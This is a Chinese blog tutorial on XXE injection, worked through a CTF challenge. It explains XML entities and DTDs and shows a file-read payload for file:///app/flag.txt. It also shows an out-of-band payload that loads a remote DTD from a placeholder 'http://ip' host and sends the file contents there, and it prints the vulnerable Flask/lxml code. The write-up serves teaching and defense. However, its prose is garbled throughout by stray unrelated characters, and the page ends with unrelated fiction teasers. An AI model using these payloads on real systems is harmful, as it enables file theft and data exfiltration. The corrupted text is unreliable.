從一道題目學習XXE漏洞

0x01.xxe漏洞

XXE漏洞全稱XML External Entity Injection即xml外部實體注入漏洞,XXE漏洞發(fā)生在應(yīng)用程序解析XML輸入時愿险,沒有禁止外部實體的加載颇蜡,導致可加載惡意外部文件,造成文件讀取辆亏、命令執(zhí)行风秤、內(nèi)網(wǎng)端口掃描、攻擊內(nèi)網(wǎng)網(wǎng)站扮叨、發(fā)起dos攻擊等危害缤弦。xxe漏洞觸發(fā)的點往往是可以上傳xml文件的位置,沒有對上傳的xml文件進行過濾甫匹,導致可上傳惡意xml文件甸鸟。

0x02.xml定義

XML由3個部分構(gòu)成惦费,它們分別是:文檔類型定義(Document Type Definition兵迅,DTD),即XML的布局語言薪贫;可擴展的樣式語言(Extensible Style Language恍箭,XSL),即XML的樣式表語言瞧省;以及可擴展鏈接語言(Extensible Link Language扯夭,XLL)。

0x02.xml的作用

XML使用元素和屬性來描述數(shù) 據(jù)鞍匾。在數(shù)據(jù)傳送過程中交洗,XML始終保留了諸如父/子關(guān)系這樣的數(shù)據(jù)結(jié)構(gòu)。幾個應(yīng)用程序 可以共享和解析同一個XML文件橡淑,不必使用傳統(tǒng)的字符串解析或拆解過程构拳。

基本語法

所有 XML 元素都須有關(guān)閉標簽。

XML 標簽對大小寫敏感。

XML 必須正確地嵌套置森。

XML 文檔必須有根元素斗埂。

XML 的屬性值須加引號。

實體引用(在標簽屬性凫海,以及對應(yīng)的位置值可能會出現(xiàn)<>符號呛凶,但是這些符號在對應(yīng)的XML中都是有特殊含義的,這時候我們必須使用對應(yīng)html的實體對應(yīng)的表示行贪,比如<傅好對應(yīng)的實體就是<漾稀,>符號對應(yīng)的實體就是>)

XML中的注釋,在XML中編寫注釋的語法與 HTML 的語法很相似瓮顽。()

在 XML 中县好,空格會被保留,多個空格不會被合并為一個。

免費領(lǐng)取學習資料
2021年全套網(wǎng)絡(luò)安全資料包及最新面試題
(滲透工具暖混,環(huán)境搭建缕贡、HTML,PHP拣播,MySQL基礎(chǔ)學習晾咪,信息收集,SQL注入,XSS贮配,CSRF谍倦,暴力破解等等)

示例如下:

<?xml version="1.0" encoding="UTF-8"?>

<!-- ?XML聲明? -->

<!DOCTYPE  文件名 [

<!ENTITY實體名 "實體內(nèi)容">

]>

<!-- ?文檔類型定義(DTD)? -->

<元素名稱 category="屬性">

文本或其他元素

</元素名稱>

<!-- ?文檔元素? -->

0x03.xml格式說明

XML用于標記電子文件使其具有結(jié)構(gòu)性的標記語言,可以用來標記數(shù)據(jù)泪勒、定義數(shù)據(jù)類型昼蛀,是一種允許用戶對自己的標記語言進行定義的源語言。XML文檔結(jié)構(gòu)包括XML聲明圆存、DTD文檔類型定義(可選)叼旋、文檔元素。

<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->

<!DOCTYPE note [
        <!ELEMENT note (to,from,heading,body)>
        <!ELEMENT to (#PCDATA)>
        <!ELEMENT from (#PCDATA)>
        <!ELEMENT heading (#PCDATA)>
        <!ELEMENT body (#PCDATA)>
        ]><!--文檔類型定義-->

<note>
    <to>xxe</to>
    <from>ljpm</from>
    <heading>Text</heading>
    <body>Only test!</body>
</note><!--文檔元素-->

0x04.DTD

文檔類型定義(DTD)可定義合法的XML文檔構(gòu)建模塊沦辙。它使用一系列合法的元素來定義文檔的結(jié)構(gòu)夫植。DTD可被成行地聲明于XML文檔中,也可作為一個外部引用油讯。帶有DTD的XML文檔實例

1.外部DTD
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->

<!DOCTYPE root-element SYSTEM "test.dtd">

<note>
    <to>xxe</to>
    <from>ljpm</from>
    <heading>Text</heading>
    <body>Only test!</body>
</note><!--文檔元素-->

test.dtd

<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

0x05.DTD數(shù)據(jù)類型

PCDATA的意思是被解析的字符數(shù)據(jù)/

PCDATA的意思是被解析的字符數(shù)據(jù)详民,PCDATA是會被解析器解析的文本

CDATA的意思是字符數(shù)據(jù)

CDATA是不會被解析器解析的文本,在這些文本中的標簽不會被當作標記來對待陌兑,其中的實體也不會被展開沈跨。

0x06.DTD實體介紹

1.內(nèi)部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->

<!DOCTYPE note[
        <!ELEMENT note (name,pwd)>
        <!ENTITY name "admin">
        <!ENTITY pwd "admin">
        ]>

<note>
    <name>&name;</name>
    <pwd>&pwd;</pwd>
</note><!--文檔元素-->

結(jié)果如下:

xml-1.png
2.外部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->

<!DOCTYPE note[
        <!ENTITY user SYSTEM "test.xml">
        ]>

<note>&user;</note><!--文檔元素-->

3.參數(shù)實體+外部實體

test.xml

<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->

<!DOCTYPE note [
        <!ENTITY % user "admin">
        <!ENTITY % pwd "admin">
        <!ENTITY % ljpm SYSTEM "./dddd.dtd">
        %ljpm;
        ]>

<note>&people;</note><!--文檔元素-->

dddd.dtd

<!ENTITY people "%user;%pwd;">

PS:%name(參數(shù)實體)是在DTD中被引用的,而&name;是在xml文檔中被引用的兔综。XXE主要是利用了DTD引用外部實體導致的漏洞饿凛。

0x07.怎么判斷網(wǎng)站是否存在XXE漏洞

最直接的方法就是用burp抓包隅俘,然后,修改HTTP請求方法笤喳,修改Content-Type頭部字段等等为居,查看返回包的響應(yīng),看看應(yīng)用程序是否解析了發(fā)送的內(nèi)容杀狡,一旦解析了蒙畴,那么有可能XXE攻擊漏洞。

0x08.示例如下:

1.實驗環(huán)境

SpecialOrder

2.分析

首頁登錄試驗環(huán)境將會被重定向到一個登錄界面:

xml-2.png

環(huán)境有個注冊選項呜象,我們先注冊一個用戶膳凝,然后登錄:

xml-3.png

首頁的右上角有幾個路由,代表幾個功能恭陡,我們可以一一嘗試蹬音。在http://192.168.153.128:5000/create-posturl下有一個類似于博客的提交框,可能存在存儲性的xss

xml-4.png

嘗試了一下休玩,不存在xss

xml-5.png

http://192.168.153.128:5000/customize我們可以為上面我們創(chuàng)建的帖子添加樣式:

xml-6.png

添加樣式后的結(jié)果如下:

xml-7.png

從上面的結(jié)果來看我們可以自定義帖子的css樣式參數(shù):

* {
    font-size: 51px;
    color: red;
}

至于上面的51px;為什么不是50px;我也不知道QAQ著淆。這個環(huán)境就只有兩個功能,上面那個發(fā)帖子的功能和這個修改樣式的功能拴疤,發(fā)帖子功能大概沒什么bug永部,唯有這個修改樣式的比較可疑。我們可以通過burpsuite抓包分析一下呐矾。

xml-8.png

發(fā)送的數(shù)據(jù)類型是Content-Type: application/json苔埋。我們將其改成Content-Type: application/xml,看看接不接受xml蜒犯。

xml-9.png

通過其返回沒有報錯组橄,因此判斷是支持xml的,刷新一下頁面進一步驗證:

xml-10.png

現(xiàn)在我們嘗試進行xml注入:

xml-11.png

結(jié)果如下:

xml-12.png

接下來就是讀取flag.txt文件(環(huán)境沒有添加flag.txt)罚随,最后的payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
        <!ENTITY file SYSTEM "file:///app/flag.txt">
        ]>
<root>
    <color>&file;</color>
    <size>40px</size>
</root>

0x09.Special Order pt2

0x41414141 CTF的一道題目該題是上一題的進化版(沒有環(huán)境)玉工,允許加載外部的dtd文件,因此payload如下:發(fā)送xml請求

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % xxe SYSTEM "http://ip/payload.dtd">
%xxe;
]>
<root>
    <color>&send;</color>
    <size>40px</size>
</root>

在我們的服務(wù)器上

<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip/?%file;'>"> %all;

0x08環(huán)境中代碼有問題的部分

elif request.content_type == "application/xml" or request.content_type == "text/xml":
            print(request.data)
            parser = etree.XMLParser()
            k = etree.fromstring(request.data, parser)
            post_color = ""
            post_size = ""
            w = ""
            for i in k.getchildren():
                if i.tag == "color":
                    post_color = i.text
                elif i.tag == "size":
                    post_size = i.text
            if db.session.query(settings_map).filter_by(username=session['username']).first():
                db.session.query(settings_map).filter_by(username=session['username']).update({"size": post_size, "color": post_color})
                db.session.commit()
                return "DONE :D"
            else:
                engine.execute(settings_table.insert(), username=session['username'], color=post_color, size=post_size)
                return "DONE :D"

沒有過濾造成的毫炉。

0x0A.防御方法:

禁用外部實體

過濾和驗證用戶提交的XML數(shù)據(jù)

不允許XML中含有任何自己聲明的DTD

有效的措施:配置XML parser只能使用靜態(tài)DTD瓮栗,禁止外來引入削罩;對于Java來說瞄勾,直接設(shè)置相應(yīng)的屬性值為false即

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市弥激,隨后出現(xiàn)的幾起案子进陡,更是在濱河造成了極大的恐慌,老刑警劉巖微服,帶你破解...
    沈念sama閱讀 217,509評論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件趾疚,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機糙麦,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,806評論 3 394
  • 文/潘曉璐 我一進店門辛孵,熙熙樓的掌柜王于貴愁眉苦臉地迎上來颠黎,“玉大人柑晒,你說我怎么就攤上這事∠脖酰” “怎么了焚廊?”我有些...
    開封第一講書人閱讀 163,875評論 0 354
  • 文/不壞的土叔 我叫張陵冶匹,是天一觀的道長。 經(jīng)常有香客問我咆瘟,道長嚼隘,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,441評論 1 293
  • 正文 為了忘掉前任袒餐,我火速辦了婚禮飞蛹,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘灸眼。我一直安慰自己桩皿,他們只是感情好,可當我...
    茶點故事閱讀 67,488評論 6 392
  • 文/花漫 我一把揭開白布幢炸。 她就那樣靜靜地躺著泄隔,像睡著了一般。 火紅的嫁衣襯著肌膚如雪宛徊。 梳的紋絲不亂的頭發(fā)上佛嬉,一...
    開封第一講書人閱讀 51,365評論 1 302
  • 那天,我揣著相機與錄音闸天,去河邊找鬼暖呕。 笑死,一個胖子當著我的面吹牛苞氮,可吹牛的內(nèi)容都是我干的湾揽。 我是一名探鬼主播,決...
    沈念sama閱讀 40,190評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼笼吟,長吁一口氣:“原來是場噩夢啊……” “哼库物!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起贷帮,我...
    開封第一講書人閱讀 39,062評論 0 276
  • 序言:老撾萬榮一對情侶失蹤戚揭,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后撵枢,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體民晒,經(jīng)...
    沈念sama閱讀 45,500評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡精居,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,706評論 3 335
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了潜必。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片靴姿。...
    茶點故事閱讀 39,834評論 1 347
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖磁滚,靈堂內(nèi)的尸體忽然破棺而出空猜,到底是詐尸還是另有隱情,我是刑警寧澤恨旱,帶...
    沈念sama閱讀 35,559評論 5 345
  • 正文 年R本政府宣布辈毯,位于F島的核電站,受9級特大地震影響搜贤,放射性物質(zhì)發(fā)生泄漏谆沃。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,167評論 3 328
  • 文/蒙蒙 一仪芒、第九天 我趴在偏房一處隱蔽的房頂上張望唁影。 院中可真熱鬧,春花似錦掂名、人聲如沸据沈。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,779評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽锌介。三九已至,卻和暖如春猾警,著一層夾襖步出監(jiān)牢的瞬間孔祸,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,912評論 1 269
  • 我被黑心中介騙來泰國打工发皿, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留崔慧,地道東北人。 一個月前我還...
    沈念sama閱讀 47,958評論 2 370
  • 正文 我出身青樓穴墅,卻偏偏與公主長得像惶室,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子玄货,可洞房花燭夜當晚...
    茶點故事閱讀 44,779評論 2 354

推薦閱讀更多精彩內(nèi)容